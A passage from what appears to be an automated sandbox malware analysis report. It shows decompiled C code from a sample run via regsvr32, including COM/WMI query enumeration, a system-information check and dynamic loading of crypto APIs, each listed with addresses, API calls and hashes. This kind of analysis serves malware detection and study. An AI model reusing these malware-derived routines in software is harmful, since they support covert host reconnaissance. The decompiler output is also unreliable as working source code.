					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E027A8D70(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













            0x027ae510
            0x027ae513
            0x027ae516
            0x027ae527
            0x027ae52d
            0x027ae53e
            0x027ae546
            0x027ae597
            0x027ae597
            0x027ae59c
            0x027ae5a1
            0x027ae5a1
            0x027ae5a4
            0x027ae5a9
            0x027ae5ae
            0x027ae5ae
            0x027ae5b1
            0x027ae548
            0x027ae549
            0x027ae54f
            0x027ae560
            0x027ae565
            0x00000000
            0x027ae567
            0x027ae574
            0x027ae57c
            0x00000000
            0x027ae57e
            0x027ae580
            0x027ae588
            0x00000000
            0x027ae58a
            0x027ae58d
            0x027ae593
            0x027ae593
            0x027ae588
            0x027ae57c
            0x027ae565
            0x027ae5b6

            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE516
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE527
            • CoCreateInstance.OLE32(027BC8A0,00000000,00000001,027BC8B0,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE53E
            • SysAllocString.OLEAUT32(00000000), ref: 027AE549
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE574
              • Part of subcall function 027A8D70: RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
            • API String ID: 1610782348-0
            • Opcode ID: 0d8d24aae4f0e33e6ab347eb8d47c14d2a4213e650695d0d1bcc2c654cb1e51e
            • Instruction ID: 0ab7347a7246871b736583cae3d61a5ec62fdbb7bdcee680efdbec345daa6f88
            • Opcode Fuzzy Hash: 0d8d24aae4f0e33e6ab347eb8d47c14d2a4213e650695d0d1bcc2c654cb1e51e
            • Instruction Fuzzy Hash: 39211A70B00255BBEB258F52DC5DEAFBF7CEFC6B24F1041ADB615A6290D6709A00DA70
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027ADE65 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E027ADE65(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}





            0x027ade6d
            0x027ade78
            0x027ade83
            0x027ade6f
            0x027ade71
            0x027ade73
            0x027ade73

            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,027AE23E), ref: 027ADE78
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: 430f5e50e3f9067ddfc623882b7dab5bc7752958f7f882d4acba4668494b0438
            • Instruction ID: 8b684cc03512208b36121bc20af725e2ec3ae9c2ce103bb4675c9a8b9aa5656e
            • Opcode Fuzzy Hash: 430f5e50e3f9067ddfc623882b7dab5bc7752958f7f882d4acba4668494b0438
            • Instruction Fuzzy Hash: 67C01271A0420A96CF5597A5A516AAA72F85B4450DF100595EE02F10C1E660DD514660
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AEB47 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E027AEB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E027AE503(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E027A8D70(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E027A8D86( &_v60, 0xfffffffe);
					E027AE5B7( &_v104);
					return _t320;
				}
				_t165 = E027A9F8F(_t255, 0x30f);
				 *_t328 = 0x2ad;
				_v52 = _t165;
				_t166 = E027A9F8F(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E027A9BF7(_t165);
				_v60 = _t322;
				E027A8D41( &_v52);
				E027A8D41( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E027A9F8F(_t255, 0x103e);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E027A8D41( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E027A8D86( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E027A9A5A(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E027A9A5A(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E027A8E04(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E027A8D70( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E027A8D86(_t136, 0);
								E027A8D86( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E027A9A5A(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E027A9F8F(_t281, 0x3f4);
								 *_t329 = 0x1b4;
								_t217 = E027A9F8F(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E027A8D70(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E027A8D41( &_v92);
											E027A8D41( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E027A9FEE();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E027A8D70(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E027A9F8F(_t283, 0x12c);
										E027A9FEE( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E027A8D41( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E027A9A5A(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E027AEA2B( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E027A8D86( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































            0x027aeb50
            0x027aeb56
            0x027aeb5d
            0x027aeb60
            0x027aeb63
            0x027aeb68
            0x027aeb6a
            0x027aeb6f
            0x027aefb7
            0x027aefb7
            0x027aeb7c
            0x027aeb7e
            0x027aeb81
            0x027aeb84
            0x027aef9c
            0x027aefa2
            0x027aefac
            0x00000000
            0x027aefb1
            0x027aeb8f
            0x027aeb96
            0x027aeb9d
            0x027aeba0
            0x027aeba5
            0x027aeba7
            0x027aebaa
            0x027aebad
            0x027aebae
            0x027aebb7
            0x027aebbd
            0x027aebc0
            0x027aebc9
            0x027aebce
            0x027aebd3
            0x027aebea
            0x027aebf7
            0x027aebfa
            0x027aec01
            0x027aec06
            0x027aec0d
            0x027aec12
            0x027aec19
            0x027aec1b
            0x027aec27
            0x027aec2a
            0x027aec2c
            0x027aef8c
            0x027aef8d
            0x027aef96
            0x00000000
            0x027aef96
            0x027aec32
            0x027aec35
            0x027aec38
            0x027aec3b
            0x027aec3d
            0x027aef58
            0x027aef5b
            0x027aef5e
            0x027aef60
            0x027aef82
            0x027aef87
            0x027aef62
            0x027aef65
            0x027aef70
            0x027aef77
            0x027aef77
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x027aec43
            0x027aec43
            0x027aec55
            0x027aec58
            0x027aec5a
            0x00000000
            0x00000000
            0x027aec62
            0x027aec65
            0x027aec68
            0x027aec6b
            0x027aec6e
            0x027aec71
            0x00000000
            0x00000000
            0x027aec77
            0x027aec85
            0x027aec88
            0x027aec8a
            0x027aeca3
            0x027aecb2
            0x027aecba
            0x027aecba
            0x027aecbd
            0x027aecc4
            0x027aecc8
            0x027aecce
            0x027aecd0
            0x027aef40
            0x027aef46
            0x027aef4c
            0x027aef4f
            0x027aef4f
            0x00000000
            0x027aef4f
            0x027aecdf
            0x027aecf3
            0x027aecf7
            0x027aecf9
            0x027aecfe
            0x027aef0d
            0x027aef13
            0x027aef1e
            0x027aef29
            0x027aef2f
            0x027aef35
            0x027aef38
            0x00000000
            0x027aef38
            0x027aed04
            0x027aeedb
            0x027aeedb
            0x027aeede
            0x027aeee1
            0x00000000
            0x00000000
            0x027aed0c
            0x027aed14
            0x027aed1b
            0x027aed21
            0x027aed23
            0x00000000
            0x00000000
            0x027aed2c
            0x027aed41
            0x027aed47
            0x027aed50
            0x027aed53
            0x027aed56
            0x027aed58
            0x027aeece
            0x027aeed1
            0x027aeeda
            0x027aeeda
            0x00000000
            0x027aeeda
            0x027aed68
            0x027aed6b
            0x027aed72
            0x027aed78
            0x027aed7b
            0x027aed7e
            0x027aed81
            0x027aed84
            0x027aedc0
            0x027aedc0
            0x027aedc3
            0x027aee6f
            0x027aee83
            0x027aee93
            0x027aee97
            0x027aee99
            0x027aeeb0
            0x027aeeb4
            0x027aeebd
            0x027aeec8
            0x00000000
            0x027aeec8
            0x027aee9f
            0x027aeea0
            0x027aeea5
            0x027aeea5
            0x027aeea7
            0x027aeea8
            0x027aeead
            0x00000000
            0x027aeead
            0x027aedc9
            0x027aedc9
            0x027aedcc
            0x027aee37
            0x027aee4b
            0x027aee5b
            0x027aee5f
            0x027aee61
            0x00000000
            0x00000000
            0x027aee67
            0x027aee68
            0x00000000
            0x027aee68
            0x027aedce
            0x027aedce
            0x027aedd1
            0x00000000
            0x00000000
            0x027aedd3
            0x027aedd6
            0x00000000
            0x00000000
            0x027aedd8
            0x027aedd8
            0x027aedde
            0x027aedfa
            0x027aee09
            0x027aee12
            0x027aee17
            0x027aee1a
            0x027aee20
            0x027aee20
            0x027aee25
            0x027aee31
            0x00000000
            0x027aee31
            0x027aede3
            0x00000000
            0x027aede3
            0x027aed86
            0x027aedad
            0x027aedb2
            0x027aedb7
            0x027aedb9
            0x027aedb9
            0x00000000
            0x027aedb7
            0x027aed88
            0x027aed88
            0x027aed8b
            0x00000000
            0x00000000
            0x027aed91
            0x027aed91
            0x027aed94
            0x00000000
            0x00000000
            0x027aed9a
            0x027aed9a
            0x027aed9d
            0x00000000
            0x00000000
            0x027aeda3
            0x027aeda6
            0x00000000
            0x00000000
            0x027aeda8
            0x00000000
            0x027aeda8
            0x027aeeea
            0x027aeef0
            0x027aeef6
            0x027aeef9
            0x027aeefc
            0x027aeefc
            0x027aeeff
            0x027aef00
            0x027aef03
            0x027aef05
            0x00000000
            0x00000000
            0x027aef55
            0x027aef55
            0x00000000
            0x027aef55
            0x027aec8c
            0x027aec92
            0x00000000
            0x027aec92
            0x027aef52
            0x00000000
            0x027aebd5
            0x027aebda
            0x027aebdf
            0x00000000
            0x027aebe3

            APIs
              • Part of subcall function 027AE503: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE516
              • Part of subcall function 027AE503: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE527
              • Part of subcall function 027AE503: CoCreateInstance.OLE32(027BC8A0,00000000,00000001,027BC8B0,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE53E
              • Part of subcall function 027AE503: SysAllocString.OLEAUT32(00000000), ref: 027AE549
              • Part of subcall function 027AE503: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,027AE834,0000054E,00000000,00000000,00000005), ref: 027AE574
              • Part of subcall function 027A8D70: RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            • SysAllocString.OLEAUT32(00000000), ref: 027AEBF0
            • SysAllocString.OLEAUT32(00000000), ref: 027AEC04
            • SysFreeString.OLEAUT32(?), ref: 027AEF8D
            • SysFreeString.OLEAUT32(?), ref: 027AEF96
              • Part of subcall function 027A8D86: HeapFree.KERNEL32(00000000,00000000), ref: 027A8DCC
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: 2e1f7990805e0fc4846f5f6253b252bba49bedba879690996117737b9ab93e32
            • Instruction ID: bbed1ce54bad34ba3ca0db0c68b7f262da464e5f7ae8491a7b73a76e6108cf5e
            • Opcode Fuzzy Hash: 2e1f7990805e0fc4846f5f6253b252bba49bedba879690996117737b9ab93e32
            • Instruction Fuzzy Hash: A3E14271E00219DFDB15DFA4C8A8EEEBBB9FF89320F148669E515A7250DB31A901CF50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D511F09 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
            Download Yara Rule
            C-Code - Quality: 73%
            			E6D511F09(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x6d55ce08; // 0x70cfd039
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6d55dda0 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x6d55dda0 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E6D50ED85(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6d55dda0 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E6D50E99B( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6D50E99B();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0x6d51267e
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0x6d51267e
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6D508B95(_v8 ^ _t136);
			}


































            0x6d511f11
            0x6d511f18
            0x6d511f1b
            0x6d511f23
            0x6d511f27
            0x6d511f33
            0x6d511f36
            0x6d511f39
            0x6d511f40
            0x6d511f48
            0x6d511f4b
            0x6d511f51
            0x6d511f57
            0x6d511f5c
            0x6d511f5e
            0x6d511f61
            0x6d511f66
            0x6d511f70
            0x6d511f77
            0x6d511f7a
            0x6d511f81
            0x6d511f88
            0x6d511fb4
            0x6d511fda
            0x6d511fdc
            0x00000000
            0x6d511fb6
            0x6d511fb9
            0x6d512080
            0x6d51208c
            0x6d512097
            0x6d51209c
            0x6d511fbf
            0x6d511fc6
            0x6d511fcb
            0x6d511fd1
            0x6d511fd7
            0x00000000
            0x6d511fd7
            0x6d511fd1
            0x6d511fb9
            0x6d511f8a
            0x6d511f8e
            0x6d511f91
            0x6d511f97
            0x6d511f99
            0x6d511f9c
            0x6d511fa0
            0x6d511fdd
            0x6d511fe0
            0x6d511fe1
            0x6d511fe6
            0x6d511fec
            0x6d511ff2
            0x6d512001
            0x6d512007
            0x6d51200d
            0x6d512012
            0x6d51201a
            0x6d51202e
            0x6d5120a1
            0x6d5120a7
            0x6d512030
            0x6d512038
            0x6d512041
            0x6d512047
            0x00000000
            0x6d512049
            0x6d51204b
            0x6d51204e
            0x6d512052
            0x6d512067
            0x00000000
            0x6d512069
            0x6d51206d
            0x6d51206f
            0x6d512072
            0x00000000
            0x6d512072
            0x6d51206d
            0x6d512067
            0x6d512047
            0x6d512041
            0x6d51202e
            0x6d512012
            0x6d511fec
            0x00000000
            0x6d512075
            0x6d512075
            0x6d5120a9
            0x6d5120bb

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,6D51267E,?,00000000,?,00000000,00000000), ref: 6D511F4B
            • __fassign.LIBCMT ref: 6D511FC6
            • __fassign.LIBCMT ref: 6D511FE1
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6D512007
            • WriteFile.KERNEL32(?,?,00000000,~&Qm,00000000,?,?,?,?,?,?,?,?,?,6D51267E,?), ref: 6D512026
            • WriteFile.KERNEL32(?,?,00000001,~&Qm,00000000,?,?,?,?,?,?,?,?,?,6D51267E,?), ref: 6D51205F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID: ~&Qm
            • API String ID: 1324828854-113722129
            • Opcode ID: d4845c0a456978ea7ea6089f9d682ae35a49d87698851b4c49001b95ca3c67e6
            • Instruction ID: d7b25c9e6f02fbe85c1eca361fb5f7fe47f5f04b362a4a26146407471368acc6
            • Opcode Fuzzy Hash: d4845c0a456978ea7ea6089f9d682ae35a49d87698851b4c49001b95ca3c67e6
            • Instruction Fuzzy Hash: AC51E275A0420A9FEF14CFA8CC85BEEBBF8EF4A300F15455AE951E7681E7309940CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027B296E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E027B296E(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E027B28C9( &_v16);
				return 0;
			}











            0x027b2974
            0x027b2986
            0x027b298a
            0x027b29fe
            0x00000000
            0x027b2a00
            0x027b299a
            0x027b299e
            0x00000000
            0x00000000
            0x027b29a6
            0x027b29a8
            0x027b29ad
            0x00000000
            0x00000000
            0x027b29b7
            0x027b29bb
            0x00000000
            0x00000000
            0x027b29bd
            0x027b29c2
            0x027b29c4
            0x027b29c6
            0x027b29cb
            0x027b29d0
            0x00000000
            0x00000000
            0x027b29db
            0x027b29e5
            0x027b29e9
            0x00000000
            0x00000000
            0x027b29f8
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,027A7C2B), ref: 027B2980
